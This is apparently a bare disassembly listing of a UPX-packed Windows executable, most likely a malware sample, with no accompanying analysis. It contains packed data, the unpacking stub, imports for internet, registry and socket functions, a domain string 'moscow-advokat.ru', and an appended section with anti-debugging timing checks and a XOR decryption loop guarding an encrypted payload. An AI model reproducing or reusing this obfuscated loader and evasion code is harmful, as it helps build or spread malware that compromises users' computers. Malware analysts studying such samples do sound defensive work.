dd 528B396Ch, 0B44B0D57h, 39C23D6h, 667120F5h, 0F70E86EFh
dd 76206769h, 38761BFDh, 9D326576h, 67B9B64Bh, 10532064h
dd 0B81B6544h, 1421B237h, 1B17235Ch, 9B325C3Fh, 42004CABh
dd 0AC91203Fh, 3D9F1A35h, 0B01EBF23h, 654AD42h, 69443792h
dd 6DBB9E73h, 66EE7694h, 9C6D672Fh, 6C2FF62Ah, 632463C9h
dd 7974690Ah, 6E614D20h, 58C5E91Eh, 31C91AB1h, 0C59DB48Ch
dd 5234D376h, 80E4153h, 0FFFFEFBCh, 0A4C11BFFh, 0DD499F8Eh
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 0EDFFFFFFh, 8C9AC3F2h, 0CC4D8556h, 0D3AD0FE1h, 37691506h
dd 98A8FD8Dh, 0CE700B16h, 1445504Fh, 0F837FFFFh, 0EF324A39h
dd 0D847AEE3h, 0BA84DFBDh, 7380371Eh, 0DF58B81h, 92E07D4Ah
dd 0E8DFFFFFh, 0B8C52DFEh, 85E020C6h, 5068BD9Ch, 50B6296Ah
dd 42C33482h, 9808117Fh, 0FFFFFFFFh, 0E7B7B21Ch, 77899D9Ch
dd 0D3971A3Dh, 8D5029A4h, 463A96A5h, 12E8FC8Dh, 0AF10EB16h
dd 0F8457044h, 0FFFFFFEAh, 78966AD0h
dd 51439FB1h, 86A827EBh, 98A3970h, 0A1C214DEh, 167A53C1h
dd 9785C4BFh, 0A0DFA378h, 9829E70Fh, 53899E9Eh, 940724FEh
dd 0FFFFFFFFh, 75A3ECCAh, 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh
dd 873969D7h, 7B948C1Ah, 821318C6h, 4BBF3EB3h, 0F02FFFFFh
dd 0EB67E042h, 60B737B2h, 0D7D8B3AAh, 65048022h, 0FF4BA67Ah
dd 45855886h, 0FC1BFFA6h, 0EEF96EF6h, 3290C956h, 0B7A63B4Ah
dd 0EBD3D87Ah, 97EE4263h, 0F7041888h, 31505FE8h, 0A69A03CCh
dd 98B49A69h, 2C3C5878h, 69B2CD34h, 0DC5EF814h, 34D3B4CCh
dd 90A4D34Dh, 0B607480h, 7142E96Dh, 5B6D2E9Fh, 6CDC0575h
dd 0A7685B24h, 0B700492Eh, 96B60D64h, 6BC52C2Dh, 611C67ADh
dd 0DB01F06Eh, 2C7586D8h, 7A6F2F72h, 70DB7962h, 41D9ACBCh
dd 0A4147262h, 0AD600C79h, 58796C25h, 0D6674A38h, 0CA6B46F1h
dd 732E61B6h, 84277578h, 6EC73A36h, 3D2E1646h, 6D80B067h
dd 2FCA468Eh, 51C6C28h, 6734BB7Bh, 116F701Ah, 13617A2Eh
dd 0CF1B66C3h, 61FE3309h, 401A5F13h, 676F8E6Eh, 776B7543h
dd 675DBD90h, 1F74D85Eh, 1FA56364h, 0FCA9EB59h, 2D736F6Ch
dd 0A72E5861h, 6BADB220h, 0AB75E35Bh, 0BE62166Ch, 0B6BB253Dh
dd 7266B92Fh, 4A616C66h, 0EEC09FEh, 61726733h, 74612E7Ah
dd 6D0B8180h, 7736876Dh, 7DBBDA2Dh, 1EE5AE6Ah, 6362CB75h
dd 0BF676621h, 7FDB0BEAh, 6D6C6B6Ah, 71706F6Eh, 77927452h
dd 0DA7A7978h, 0F95FFE58h, 44434241h, 48474645h, 4E4B4A49h
dd 7B5751FCh, 544058A1h, 5A59581Ah, 0F5ADB81Bh, 77A08152h
dd 0B62A2038h, 2140E907h, 0FF8C6702h, 0F60C4BCBh, 4B43CA56h
dd 26501320h, 0F66E9553h, 4E4F0B64h, 490B0A47h, 0FA5DAC3Fh
dd 92353407h, 2F0C4F4Ah, 54495551h, 24816B6Fh, 477B561Ah
dd 0B6E5F766h, 74231163h, 841779B5h, 0C0E0075Fh, 20A202CBh
dd 0BED6F328h, 6203E85Dh, 34203B64h, 36204549h, 0B060915h
dd 0B41EAC30h, 70164035h, 29EC5Fh, 371776Bh, 0CEBA2C61h
dd 4D02E6B5h, 690F075Ch, 8127C03h, 2D6569B7h, 0A6C71331h
dd 0C48A08BBh, 0FFEE4009h, 6C01FF97h, 63727473h, 4741706Dh
dd 6F4C7465h, 656C6163h, 6F666E49h, 56715B0Fh, 44525394h
dd 452E6309h, 797F14B7h, 65595715h, 588A4746h, 9E303483h
dd 0BD9A6954h, 0E6DB997h, 206F540Bh, 0ED65A015h, 4146000Ch
dd 3C42BF0Ch, 4D3F0DF6h, 2DAC646Fh, 0B016614Eh, 8E412D93h
dd 7E5E4169h, 6F40AEFh, 4309DF1Fh, 1E79706Fh, 387BFEE4h
dd 456E6993h, 81516578h, 0ED06FFF6h, 9A6C6F7Eh, 53323370h
dd 7370616Eh, 19746F68h, 0A0CDADDDh, 723212D3h, 5540F73h
dd 0C641AD73h, 0F6182C35h, 2180FB06h, 7478654Eh, 54727068h
dd 7867CB6Ch, 0FF087645h, 538B4661h, 42B7B9B1h, 624F7BE4h
dd 4414996Ah, 0A136796h, 4CB715CFh, 0CAC94561h, 263A15ADh
dd 6378452Fh, 7B61DBB2h, 5C6E2354h, 65706506h, 5F092C97h
dd 2E6E4711h, 0D8A06F12h, 64410B3Fh, 140F7264h, 7262694Ch
dd 84B60C28h, 4D2B8961h, 8DC4625h, 5FAB1F67h, 100E4865h
dd 9F874496h, 0C2E16CCBh, 701D166Ch, 476B63A2h, 6D61D12Dh
dd 4DE57275h, 366C78DFh, 0C4F39289h, 45986A0Dh, 0E193198h
dd 7B0E8162h, 31E91943h, 0DB639249h, 6BE48376h, 630A6465h
dd 522D6D13h, 70C9785Dh, 45083A1Bh, 0C426657Ah, 3D5E8613h
dd 5868D100h, 15EECDA1h, 1A747079h, 710C4B2h, 0A2FB6CDh
dd 0E611244h, 0C3057BECh, 79666976h, 3CCA6746h, 0B7B016D5h
dd 578F10A1h, 112C796Fh, 0BEC1866Dh, 1079654Bh, 651EB252h
dd 178763F9h, 4114EF3Eh, 69757163h, 871A1672h, 8F494D0Dh
dd 0B9B6745Ch, 0C13AF759h, 0EF0D9267h, 3B0E1041h, 3E0D2194h
dd 90EC510Fh, 350AD6B0h, 98302511h, 2D0466C5h, 0E19E1021h
dd 5FB5458Eh, 0F5696241h, 0C34D6853h, 0AF8B1446h, 0F8DE136Eh
dd 3B77E5DDh, 5696F78h, 69736E61h, 0B6EF6304h, 736FCBF6h
dd 5F48455Fh, 6744DC70h, 78435F0Bh, 98263878h, 0E74C6C4Ah
dd 83936B81h, 768627Dh, 2A427970h, 9A15BB3Bh, 5FDDCFE2h
dd 29332868h, 1CD7399Bh, 11727473h, 5B49060Dh, 6D6C31CCh
dd 0AC0FBA36h, 0D9B6B774h, 3CE9946Ch, 7C737701h, 1966748Bh
dd 5219A682h, 5639651Bh, 3AA29168h, 0BD8146Fh, 1B366331h
dd 0C7290B21h, 5383B669h, 0F44F6449h, 0F6D83B50h, 35A78AE0h
dd 11417355h, 5B01196Ch, 1B114E0Eh, 5D3706A6h, 77936EBBh
dd 0C5D55753h, 525574A2h, 0B2CBA564h, 2125B2Ch, 0D027308h
dd 0B2CB2C01h, 0B6F392Ch, 2CB21734h, 90CB2CBh, 54101304h
dd 16CA00CFh, 46455057h, 2FA025F5h, 0D3275DB7h, 9ACF0340h
dd 0F001FEDh, 6010B01h, 1312340Ch, 98D81D18h, 30E5017Bh
dd 0DD0B3135h, 2C0092Ch, 700C076Bh, 25B99D81h, 710341Eh
dd 0B258E58Ah, 3B680306h, 176C28Ch, 0B0647FC2h, 53581E01h
dd 42EBA75h, 0C1903303h, 34360608h, 0C837C0C4h, 0E004F4EDh
dd 0FB90642Eh, 271211CDh, 48586E0Ah, 0C03838h, 61800060h
dd 33D205Bh, 1962Ch, 0
dd 0FF2000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset aMoscowAdvokat_ ; "moscow-advokat.ru"
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508422
; ---------------------------------------------------------------------------
align 8
loc_31508418: ; CODE XREF: UPX1:loc_31508429�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150841E: ; CODE XREF: UPX1:315084B6�j
; UPX1:315084CD�j
add ebx, ebx
jnz short loc_31508429
loc_31508422: ; CODE XREF: UPX1:31508410�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508429: ; CODE XREF: UPX1:31508420�j
jb short loc_31508418
mov eax, 1
loc_31508430: ; CODE XREF: UPX1:3150843F�j
; UPX1:3150844A�j
add ebx, ebx
jnz short loc_3150843B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150843B: ; CODE XREF: UPX1:31508432�j
adc eax, eax
add ebx, ebx
jnb short loc_31508430
jnz short loc_3150844C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508430
loc_3150844C: ; CODE XREF: UPX1:31508441�j
xor ecx, ecx
sub eax, 3
jb short loc_31508460
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084D2
mov ebp, eax
loc_31508460: ; CODE XREF: UPX1:31508451�j
add ebx, ebx
jnz short loc_3150846B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150846B: ; CODE XREF: UPX1:31508462�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
jnz short loc_3150849C
inc ecx
loc_3150847D: ; CODE XREF: UPX1:3150848C�j
; UPX1:31508497�j
add ebx, ebx
jnz short loc_31508488
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508488: ; CODE XREF: UPX1:3150847F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150847D
jnz short loc_31508499
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150847D
loc_31508499: ; CODE XREF: UPX1:3150848E�j
add ecx, 2
loc_3150849C: ; CODE XREF: UPX1:3150847A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084BC
loc_315084AD: ; CODE XREF: UPX1:315084B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_315084AD
jmp loc_3150841E
; ---------------------------------------------------------------------------
align 4
loc_315084BC: ; CODE XREF: UPX1:315084AB�j
; UPX1:315084C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084BC
add edi, ecx
jmp loc_3150841E
; ---------------------------------------------------------------------------
loc_315084D2: ; CODE XREF: UPX1:3150845C�j
pop esi
mov edi, esi
mov ecx, 0CAh
loc_315084DA: ; CODE XREF: UPX1:315084E1�j
; UPX1:315084E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084DF: ; CODE XREF: UPX1:31508504�j
cmp al, 1
ja short loc_315084DA
cmp byte ptr [edi], 1
jnz short loc_315084DA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084DF
lea edi, [esi+6000h]
loc_3150850C: ; CODE XREF: UPX1:3150852E�j
mov eax, [edi]
or eax, eax
jz short loc_31508557
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508529: ; CODE XREF: UPX1:3150854F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3150850C
mov ecx, edi
jns short near ptr loc_3150853A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150853A: ; CODE XREF: UPX1:31508532�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508551
mov [ebx], eax
add ebx, 4
jmp short loc_31508529
; ---------------------------------------------------------------------------
loc_31508551: ; CODE XREF: UPX1:31508548�j
call dword ptr [esi+8094h]
loc_31508557: ; CODE XREF: UPX1:31508510�j
popa
jmp loc_31501D18
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00015000 ( 86016.)
; Section size in file : 00015000 ( 86016.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C4D444h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 60000387h, 84000000h, 0
dd 26003150h, 500000h, 760h dup(0)
db 90h
; ---------------------------------------------------------------------------
call sub_3150B02D
; =============== S U B R O U T I N E =======================================
sub_3150B006 proc near ; CODE XREF: sub_3150B02D+50�p
push ebx
mov ecx, 0CBFh
mov ebx, edx
loc_3150B00E: ; CODE XREF: sub_3150B006+13�j
; sub_3150B02D+57�j
xor [eax], dx
lea edx, [ebx+edx]
xchg dl, dh
lea eax, [eax+2]
loop loc_3150B00E
pop ebx
retn
sub_3150B006 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B02D
loc_3150B01D: ; CODE XREF: sub_3150B02D+3B�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3150B02D
; ---------------------------------------------------------------------------
db 0EBh
; ---------------------------------------------------------------------------
stc
; =============== S U B R O U T I N E =======================================
sub_3150B021 proc near ; CODE XREF: sub_3150B02D:loc_3150B047�p
; sub_3150B02D+20�p
rdtsc
retn
sub_3150B021 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B02D
loc_3150B024: ; CODE XREF: sub_3150B02D+8�j
; sub_3150B02D+12�j ...
mov eax, 1000h
xor ecx, ecx
jmp short loc_3150B052
; END OF FUNCTION CHUNK FOR sub_3150B02D
; =============== S U B R O U T I N E =======================================
sub_3150B02D proc near ; CODE XREF: UPX2:3150B001�p
; FUNCTION CHUNK AT 3150B01D SIZE 00000002 BYTES
; FUNCTION CHUNK AT 3150B024 SIZE 00000009 BYTES
test eax, eax
jnz short loc_3150B039
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_3150B024
jmp short loc_3150B047
; ---------------------------------------------------------------------------
loc_3150B039: ; CODE XREF: sub_3150B02D+2�j
mov dx, cs
shl ebx, 0Ah
js short loc_3150B024
jnb short loc_3150B024
cmp dh, bh
jz short loc_3150B024
loc_3150B047: ; CODE XREF: sub_3150B02D+A�j
call sub_3150B021
xchg eax, ecx
call sub_3150B021
loc_3150B052: ; CODE XREF: sub_3150B02D-2�j
neg ecx
push ebp
add eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 1E06h
sub eax, 100h
jnb short loc_3150B01D
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-63h]
call sub_3150B006
add cl, bh
js short near ptr loc_3150B00E+2
hlt
sub_3150B02D endp
; ---------------------------------------------------------------------------
db 0D6h
dd 33B55859h, 29FC5F42h, 0F925C899h, 728FEB8Fh, 0BC494F7Ch
dd 6DBFA0h, 590B4DBDh, 8EE2EA97h, 9856FBB5h, 3CC199C4h
dd 0B7DB2C64h, 0FDCDF1A8h, 9C7903F7h, 39BF058Bh, 61C4BEA2h
dd 5FAB024Eh, 0E7F8003h, 0F91AF352h, 0D880D047h, 4787322Eh
dd 0A5989352h, 0FE18C49Fh, 1B1109C8h, 3B353F2Ch, 0CA2F323Ch
dd 97C7E860h, 32DCF592h, 0E7D609FCh, 0BE83C6E1h, 0D4D1CAA3h
dd 0F8EFE6EEh, 286F34E4h, 0E5DD8C8Ah, 4509155Fh, 2A1E28D7h
dd 606F4A24h, 92AF8B7Bh, 0BDA0B683h, 6B4EE4D2h, 8897193Eh
dd 0A59381ACh, 0E9606685h, 0B7C144A6h, 66D5CFB5h, 310680CFh
dd 3F76FA24h, 0E7385BF6h, 6C3EC3DEh, 0AE92BDBBh, 0EF220EA8h
dd 786C4298h, 48D1F2F1h, 15363C67h, 3566A4FAh, 85010611h
dd 0C0CEE6B0h, 667C42EAh, 89AE84DAh, 822E147Dh, 35784EB3h
dd 6D5B8B5Dh, 0CE1D4863h, 3321CF5h, 279132Dh, 690FF77Bh
dd 0E1E5F1A7h, 0D4FA77D4h, 0BEAE283Eh, 150D8A95h, 75597AB8h
dd 0FFCD5384h, 3F032C66h, 458DE139h, 0C8FD3334h, 6AEEF7EBh
dd 0D3C6CC3Ch, 0D2BFF646h, 0F55395F2h, 8A756B97h, 4D4FE5F5h
dd 0CF574551h, 5B242A18h, 0B79CF02Bh, 7FEDC425h, 9856D734h
dd 53B7BDDAh, 0B99C1733h, 610A8793h, 7361CD31h, 58A6D06Dh
dd 0B0300642h, 1204E6A2h, 0F85FF31Ch, 0CC3266E3h, 0D9A9356Dh
dd 3BF16EF8h, 0AB970825h, 0BD98B95h, 7500D486h, 1D2005A1h
dd 2E21242Ch, 193F329h, 7BEAC127h, 1D4AF536h, 0C04C3ED8h
dd 0CD0E9FBCh, 0E47FEEA1h, 0F1636D86h, 57484E03h, 2EB8CC50h
dd 0A512281Fh, 0DF73F2D9h, 83DCE2FCh, 0CEA997E3h, 0D9A6A8C8h
dd 946350ADh, 2D711CC5h, 63555A1Fh, 52AFBF5Ch, 441F156Bh
dd 11050A2Ch, 0DFFD7AF5h, 0DF25D3DFh, 56B2B8D4h, 0A4979F13h
dd 6A2582F4h, 916B0D89h, 636CD5FDh, 0FBDADA4Dh, 3729ABB1h
dd 0EF5FB26h, 0E6D86D7Fh, 0CBB92DE0h, 0E4EAAAC5h, 95C5C3EEh
dd 503FE170h, 0EADE5944h, 440829F3h, 9490EA0Dh, 0E32228Ah
dd 1A75E0B6h, 0D7CBD328h, 96690B52h, 0AE959B86h, 8678D91Fh
dd 0C6DAEE80h, 0AF447A4Fh, 0B0A62E3Ah, 1A3E3D42h, 0D79F4492h
dd 1C28DDC8h, 4FB3C2DDh, 0ADA1A5F8h, 0B847092Ch, 79471BCh
dd 0E6D5D970h, 0C0350B7Fh, 16339A86h, 0B00FA20h, 0EB64E505h
dd 5EC8CEE8h, 8A87024Ah, 9EE267B4h, 0ADB6F816h, 0D4DD624Eh
dd 4E716EA2h, 3326D3B7h, 19F79622h, 7164F611h, 0E1E4F043h
dd 0B746A638h, 651B2BC1h, 1183B98Ch, 4541A037h, 5AB2AC6Fh
dd 0E4B53754h, 0CC171D38h, 9FC03F8h, 0C5CF5A8Eh, 1C4ECBD8h
dd 615CB0A7h, 1E8BE54Dh, 0C21E7976h, 0D0EA67Fh, 0C1262E61h
dd 136BEF3h, 1614B72Bh, 0FE61F30Fh, 202E29B9h, 491DDA26h
dd 0A99BECBAh, 25E686A3h, 0D8612C05h, 3EE6B45Fh, 0B6D4D7F9h
dd 4A1470E3h, 6F9A198h, 0EBB7288Bh, 0D0A80C6Eh, 0B5A7ADA2h
dd 0CBCCF8A7h, 2F7F1DC6h, 4EEFC986h, 0CA63416Eh, 0AD486687h
dd 98050B76h, 7CE99AD8h, 0B6CABE3Dh, 93B1D3D6h, 25F09ED1h
dd 0E17D83FEh, 8F083985h, 0E8D2B23Ah, 652C0265h, 10EE926Dh
dd 3F7C19Ch, 0E86E6CFDh, 74C0F6F2h, 0B2A5AC66h, 32797F27h
dd 6C6F9810h, 0E4D95A46h, 46092B5Dh, 0BE93C4BFh, 1033101Bh
dd 8572115Bh, 31CCE2C4h, 0BEB1B7C5h, 0C8F9F3F4h, 0FA2BF1E8h
dd 10910EBh, 4202C02h, 525F5C2Dh, 0E35F1570h, 30DEF780h
dd 0F45C56FAh, 9ABEF4F5h, 0C583C390h, 511D7156h, 0FC6D43A4h
dd 612707B3h, 153557CEh, 42C8A96Bh, 1CE95523h, 0A2E5EC06h
dd 0B4AF948Eh, 0C9FFD2A5h, 0CCFDECDCh, 851C18FFh, 7BCB9B29h
dd 0C443794Eh, 627E788Dh, 0E65A457Eh, 0CDDB5187h, 0F2125FF7h
dd 0C62E3E8Bh, 0C6A096EBh, 6E87E1A6h, 4640491Eh, 5A67EC70h
dd 6BA33A55h, 11596DBh, 9F01534Bh, 0EFD2C385h, 71443BDAh
dd 0B99C99D3h, 61C6C3B3h, 0B35CF90Dh, 1C9BE47Dh, 0B3C3003Eh
dd 0CDCB5943h, 7D023458h, 4C49F10h, 0D0F9A460h, 0B1783BDAh
dd 4B753063h, 0BC8288A0h, 4484FC40h, 7251D757h, 16443763h
dd 33DADDB9h, 5CAB011Dh, 0BD8EB052h, 473B99B7h, 0B79985FDh
dd 0E8D75434h, 0A5078699h, 7BDDD173h, 0A33D734Bh, 0CFDDD529h
dd 1492F279h, 12EBC224h, 0F614576Bh, 94B5BBD9h, 829B3542h
dd 18808592h, 72544086h, 0A8B3A385h, 3C2E34AEh, 12491936h
dd 54A9AFD3h, 0EADC8BAEh, 0B49C8E0h, 0B8CDFD98h, 5ADE5625h
dd 2A0712C5h, 9CB6B478h, 0DDB6BEA2h, 2D10330Eh, 42545A75h
dd 0DCEC65F4h, 1F4DD4C0h, 3F387AF5h, 0A5C0C6E2h, 8A7D9D1Ch
dd 6F62780Ah, 54474D68h, 392C324Eh, 1E111733h, 0FDA5AA46h
dd 0D7F1EC69h, 60996DE1h, 4AD06B42h, 0CA497E49h, 1E1C14D2h
dd 5393B3Bh, 2F5B703Eh, 596A475Ah, 6C665A78h, 818EB87Ch
dd 0B4CCA799h, 0DEC3C3A1h, 0CE96E8D6h, 0EB09F5EFh, 2F6008E4h
dd 25242E14h, 5A43762Eh, 580F5455h, 8B929F66h, 88B1989Ch
dd 0B9DC8EBBh, 0C9CCC1B3h, 0E1C48DE9h, 1D1813E8h, 3E3E2522h
dd 3454F32h, 4269623Ch, 5E657240h, 848B8660h, 0A7A19B8Fh
dd 0BACAD5AAh, 0FEF6EBF7h, 0EC2C1BEDh, 0D3C060Ch, 2B300B63h
dd 67425929h, 70607D42h, 0CF809B74h, 80BB88C4h, 0A9D2B3ABh
dd 0D3DAA5B4h, 0F8D0FECCh, 11080AF8h, 2E2B136Fh, 5A5F5012h
dd 566C6A78h, 7D886177h, 0EEA09B66h, 95B2A9AFh, 0EBCEDDA4h
dd 9DF5ECDBh, 0C4011ED0h, 333F0C15h, 4C5A2808h, 7C504F01h
dd 7A7C6B44h, 9684B26Ah, 0B2B39691h, 83B7FCBCh, 0C6D1D6DBh
dd 0EBEDF2C7h, 17080DC0h, 580A3401h, 6E445315h, 4761684Eh
dd 75934471h, 83AA8664h, 0D182B094h, 0E2DCCB8Ch, 0DDFDFED5h
dd 0CE1714FCh, 2432301Bh, 3E59055Fh, 5F4C4210h, 7C726D79h
dd 9DADF14Ch, 0AFAA8386h, 0ACDBD3A4h, 0D3FCD8BCh, 0FF0CE1F7h
dd 340D06EFh, 11480F13h, 547B4735h, 457F6D59h, 6B919350h
dd 9DBD8F8Ch, 8FAFA88Ah, 0DCCAEBC8h, 0D9E7F0CFh, 1E1F1AFEh
dd 33A1777h, 25530C38h, 556D4433h, 70490A67h, 9081B97Ah
dd 9CAB9C98h, 0BFD7D4BDh, 0CAF2EDF6h, 0EC10EBD8h, 1E1106CEh
dd 12212201h, 5D5B7E4Dh, 7262465Ch, 72869E75h, 89A8B0FBh
dd 0B8CCA083h, 0D9E298F6h, 95FDFCD8h, 190106DFh, 6C202A11h
dd 3C5D706Bh, 4C4F234Ah, 67446C42h, 0A1E6886Bh, 0BE8DA589h
dd 0C8F1D3BDh, 0C3FCE9C2h, 0F51FF4EEh, 0E0C65C1h, 3C2D0C11h
dd 5C467F2Fh, 686B6041h, 8A97AA13h, 86BBB4BEh, 0ADD1AB89h
dd 0C8CDF4C2h, 0C786FCC2h, 70A1CE2h, 2B353F27h, 28735D19h
dd 701A4557h, 7E8B7749h, 9CA28664h, 0D5ABA186h, 0CEC4C198h
dd 0F3FBDED1h, 0F0397DFCh, 1C36063Fh, 3C113310h, 5F4F5A21h
dd 6B6E7648h, 99849945h, 959ADA98h, 0A7DCCD98h, 0C2D8C1B4h
dd 0DE83ECC9h, 101A2DFEh, 0A28270Eh, 5A515726h, 6A176E4Ah
dd 6C8E416Ah, 0BE859362h, 0B6A6A49Ah, 0C0EFC3BEh, 0DEFBDBB2h
dd 0F6151FE5h, 43C0C19h, 22512D15h, 7C576746h, 7F5E7E4Ah
dd 9CA3846Ah, 0ABB2B2A7h, 0C4D8D3B0h, 0D9D4D5F0h, 0E7C6E8C6h
dd 3D650EE4h, 3D3A1F19h, 525D653Ch, 51677F54h, 6392904Fh
dd 9F93E46Eh, 0BEA7B8AAh, 0C1C4C899h, 9AE2FDC6h, 0D2103DAh
dd 7332816h, 3B52172Ah, 42415337h, 7C686E65h, 0B9E9897Eh
dd 0B9BB8585h, 0B8E0C0A4h, 0CBFDEAC8h, 0E41BEDE9h, 40305F7h
dd 55292203h, 487B4601h, 4974635Dh, 76828E71h, 8D968D9Ch
dd 0B4B2A98Fh, 0DED1F9C7h
dd 0F4E3FEF9h, 2F0A11FEh, 0F3D2802h, 7566B3Ch, 7877572Eh
dd 7E6A7B51h, 0A7B0EE6Eh, 0B8B881AFh, 0CEC4C3A1h, 0CCFAFFB8h
dd 0E708E4EEh, 19050DE1h, 3C2A2867h, 43495522h, 686A7231h
dd 7487957Dh, 84B7A698h, 0B8BEA1B2h, 0AFD5CAA1h, 0F0E6EBDAh
dd 1A02008Eh, 5E263D18h, 26435311h, 5C794C4Fh, 7E6E6B61h
dd 9F84A463h, 0D6AFBC8Fh, 0DEDBDB99h, 0D4F1F4C7h, 0C60D1ADDh
dd 0F300A10h, 2B263D07h, 40495A1Ah, 7744134Bh, 93839D66h
dd 9299A892h, 0C7FAAFB9h, 0C9D4C888h, 0E5E0E5D4h, 180F00C4h
dd 1A232725h, 345A7355h, 40776D5Fh, 6B9B566Bh, 838BAF60h
dd 9086CD8Ch, 0F0FCF398h, 0DABFA580h, 0D17630D4h, 4180618h
dd 625350Dh, 60255222h, 67457749h, 9EA59B75h, 0A1AB9C8Ch
dd 0A2DDECDAh, 0D8F8D6EEh, 0E3E3DEDDh, 0C2208FCh, 3C1E522Fh
dd 4A546434h, 567A7D6Eh, 49834478h, 0E8366502h, 0BA9502CCh
dd 5FA9AFCCh, 9FAAD83Ch, 841979FCh, 0C0B0E2Ah, 1BF1C865h
dd 6472FCCEh, 47564D40h, 347E0D5Dh, 5DD0E6D9h, 564AB71Ch
dd 0A8AA8A68h, 4E774121h, 0DBE1E7D0h, 64497F79h, 3C4464AEh
dd 0B4EC175Ch, 5C8D463h, 6ED2237Ah, 0CFC2C874h, 0EA24C599h
dd 4D0792AEh, 0B2FA77F9h, 633E1C12h, 223B515Dh, 2D4A7440h
dd 125B884Fh, 0A7E99A0Bh, 4E3184A3h, 0C0839368h, 3067C7E5h
dd 8A4DA99Eh, 33169701h, 41C7C0E2h, 35CF327Eh, 0E1182BEh
dd 0D3F5FC27h, 3524B2ABh, 0E66D436Ah, 3E28ABF6h, 968A89C7h
dd 84902178h, 0A1D1D18Ah, 0C8390F70h, 2A079DB0h, 0F040E124h
dd 766C11F7h, 0D8FCF85Ch, 0A471385Fh, 907E9CB7h, 0C847E63h
dd 5C4AD304h, 2585CE66h, 0FBA5BD40h, 0F30F1529h, 0C0509h
dd 27871972h, 0C9BD2B8Bh, 2FFFA8C3h, 0A39DFF45h, 0F5A5418Dh
dd 6D719BF7h, 13626D57h, 764A716Dh, 263593DEh, 0F463EB35h
dd 0D45C30CEh, 0E7AE84E5h, 0CA939D76h, 84787E71h, 84DC3E7Eh
dd 4E7252C2h, 0A6AAD222h, 183C0841h, 0DC3DA541h, 0E1FFDBD2h
dd 0A0B60458h, 0B12D2007h, 0B0498A95h, 6FDDEA4Dh, 5A6A545Fh
dd 0FC6E397Eh, 25721F53h, 7A0230E1h, 6BF41707h, 0BB36B828h
dd 0B8ABB1C6h, 9ECB4639h, 37F847C7h, 676A7AACh, 4D33FFEAh
